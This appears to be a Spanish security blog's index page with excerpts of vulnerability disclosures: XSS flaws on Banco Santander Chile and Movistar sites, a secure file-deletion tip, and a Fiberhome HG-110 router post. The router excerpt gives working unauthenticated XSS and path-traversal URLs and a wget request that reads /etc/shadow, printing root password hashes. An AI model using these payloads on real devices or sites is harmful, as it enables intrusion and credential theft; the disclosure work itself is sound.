EtiquetaSeguridad

El Phishing y el Banco Santander Chile

Hace unos meses reporté una vulnerabilidad XSS en la banca de personas del Banco Santander, la cual no ha sido corregida. Ahora, segun la campaña anunciada por parte de Secureless, retomaré este mismo bug y aprovecharé de reportar otros que hemos encontrado, además preparé unas pruebas de concepto para dejar en claro que podemos hacer y que no, explotando estas vulnerabilidades donde los unicos afectados son los clientes usuarios.

Las vulnerabilidades detectadas son del tipo XSS, encontradas en el sistema de clientes (banca de personas) y en el sitio web público.

Los scripts o urls vulnerables son:

  • https://www.santander.cl/transa/errores/PagError.asp
  • https://www.santander.cl/transa/productos/tc_conti/PAMPA/pcpMosTjc.asp
  • https://www.santander.cl/transa/preerror.asp

Las tres con certificado ssl, permitiendo aprovecharse de la confianza que tiene el usuario sobre el sitio.

Seguir leyendo

XSS y CSRF en sitios web de Bancos: Ellos mismos facilitan el phishing

Se está poniendo de moda el phishing y el robo de datos bancarios para realizar transferencias no deseadas, cada vez son mas los usuarios afectados y muchos de ellos no logran recuperar su dinero, simplemente el banco no responde. Por un lado tienen razón, ya que quien entregó su información personal y privada fueron ellos mismos, pocas veces este tipo de robos son debido a una falla/bug/vulnerabilidad que afecte directamente al banco.

Imagen tomada de quejasyfraudes.infoEn Chile, los bancos tienen una campaña contra el phishing donde se limitan a entregar manuales y decir “no ingreses tus datos donde no debes”, pero realmente no se preocupan de tener mecanismos de validación y protección, permitiendo que cualquier persona pueda suplantar su identidad y usar la confianza que tiene el usuario en el sitio.
Existe un sitio llamado “avispate.cl“, que supuestamente es para hacer un llamado a la gente y educar para que no caigan en este tipo de trampas y no entreguen información a cualquier sitio.

Bien, por un lado tenemos que los usuarios entregan información a personas que no corresponden, que caen en las trampas pero por otro lado, algo que es claramente responsabilidad del banco: Hacer que sus sitios y sistemas sean 100% seguros!

Seguir leyendo

Tip: Destrucción de archivos y datos en GNU/Linux

Cuando digo “destrucción” de información no me refiero a simpemente eliminarla o purgarla del disco duro, sino a sobrescribirla y hacer imposible su restauración. Existen varias utilidades y formas de hacerlo, pero yo les mostraré tres utilidades/herramientas que nos ayudarán: dd, shred y wipe. La primera, nos ayudará a zero-izar un sector de nuestro disco duro, memoria o lo que sea. Las otras dos son herramientas que nos permitiran sobreescribir y eliminar definitivamente un archivo para que sea irrecuperable. shred viene por defecto en casi todas las distribuciones unixlike, wipe se puede instalar en cualquiera.

Según los manpages,

wipe:
Wipe is a secure file wiping utility. There are some low level issues that must be taken into consideration. One of these is that there must be some sort of write barrier between passes. Wipe uses fdatasync(2) (or fsync(2)) as a write barrier, or if fsync(2) isn’t available, the file is opened with the O_DSYNC or O_SYNC flag. For wipe to be effective, each pass must be completely written. To ensure this, the drive must support some form of a write barrier, write cache flush, or write cache disabling. SCSI supports ordered command tags, has a force media access bit for commands, and write cache can be disable on mode page 8. IDE/ATA drives support write cache flushes and write cache disabling. Unfortunetly, not all drives actually disable write cache when asked to. Those drives are broken. Write caching should always be disabled, unless your system is battery backed and always powers down cleanly.

shred:
Overwrite the specified FILE(s) repeatedly, in order to make it harder for even very expensive hardware probing to recover the data.

dd:
Copy a file, converting and formatting according to the operands

Vamos a lo practico.

Seguir leyendo

Multiple XSS+CSRF encontrados en sitio web de Movistar Chile

Reportamos en Secureless una serie de vulnerabilidades XSS y CSRF que afectan al sitio web de Movistar y a sitios relacionados a la empresa. Los sitios afectados son:

Las vulnerabilidades detectadas nuevamente ponen en riesgo la seguridad del usuario aprovechandose de la confianza que existe desde el usuario hacia el sitio y viceversa.
El estado de estas vulnerabilidades es hasta ahora “Sin Reportar”, ya que por más que buscamos en el sitio web y tambien ayudandonos con google, no pudimos encontrar ningún formulario ni correo de contacto sin que nos pidiera registrarnos o ser clientes. Sólo lo reportamos vía twitter haciendo un reply a la cuenta de @MovistarChile.

Seguir leyendo

Secureless.org: Repositorio de vulnerabilidades web

Como proyecto del hacklab, nace “Secureless“, un sitio web que busca centralizar y almacenar una base de datos de sitios web vulnerables con las tipicas vulnerabilidades como XSS, SQL-I, etc.

Secureless nace simplemente de la necesidad de investigar y aprender aun mas sobre este tipo de vulnerabilidades y seguridad en la web. Aunque a muchos no les parezca lo correcto, con el tiempo nos hemos dado cuenta que las fallas se corrigen mucho mas rapido cuando son publicadas y creemos que de esta forma podemos ayudar a que los sitios sean más seguros.

Lo que buscamos en esta version es explorar un poco más en el mundo de la (in) seguridad en aplicaciones web. En esta primera version agregamos la posibilidad de que la gente pueda reportarnos mediante un mensaje cifrado sitios vulnerables y de esta forma poder contribuir de forma “segura” a este proyecto, aunque la mayoría (99%) de los sitios publicados son producto de nuestra propia invesgitacion, agradecemos a quienes nos apoyan y nos envian información al respecto.

Seguir leyendo

Vulnerabilidad en todos los routers Fiberhome HG-110 de Telefonica/Movistar

En algunos paises, Telefonica/Movistar entrega a sus clientes un router FiberHome HG-110, uno blanco y con dos antenitas:

Las vulnerabilidades que he encontrado son:

Cross-Site Scripting: https://router.internal.ip:port/cgi-bin/webproc?getpage=%3Cscript%3Ealert%28this%29%3C/script%3E&var:menu=advanced&var:page=dns

Local File Include and Directory/Path Traversal: https://router.internal.ip:port/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/passwd&var:menu=advanced&var:page=dns

Para poder explotar estas vulnerabilidades no es necesario estar autenticado.

Informacion del dispositivo:

HardwareVersion :	HG110_BH_R1A
SoftwareVersion :	HG110_BH_V1.6
Firmware Version :	1.0.0

No descarto que estas mismas (y otras) vulnerabilidades puedan afectar a otros modelos del mismo fabricante.

ACTUIALIZADO El httpd se ejecuta como “root” (mini_httpd) por lo que es posible acceder, mediante LFI, a archivos con esos privilegios.

$ wget -o /dev/null -O – “https://192.168.1.1:8000/cgi-bin
/webproc?getpage=../../../../../../../../../../../../etc/shadow&
var:menu=advanced&var:page=dns”

#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::

root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::

#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

~ $ ps ax|grep httpd

509 root 4212 SW /usr/sbin/mini_httpd -d /usr/www -c
/cgi-bin/* -u roo

~ $